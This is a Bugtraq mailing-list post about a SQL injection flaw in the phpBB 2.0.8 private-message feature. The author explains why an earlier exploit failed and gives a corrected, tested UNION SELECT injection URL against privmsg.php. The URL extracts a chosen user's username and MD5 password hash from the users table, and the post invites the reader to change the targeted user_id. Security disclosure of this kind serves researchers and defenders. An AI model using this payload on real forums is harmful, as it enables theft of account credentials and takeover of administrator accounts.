Bugtraq: phpBB 2.0.8 Exploit

[JeiAr <security () gulftech org>]

Hi guys,

 After playing around with the private message SQL injection issue on a forum that I admin I noticed that the exploit 
code posted in the authors post doesn't work correctly. Here is why:

Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each field only is able to 
hold 25 bytes at most (at least on the forums I tested it, they were all 2.0.8). Well, MD5 hash is 32 bytes, so you may 
get what looks like a valid hash @ first glance, but it doesn't work as it is an incomplete hash. Below is an example 
that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few 
versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 
1/*

Hope this helps :)

JeiAr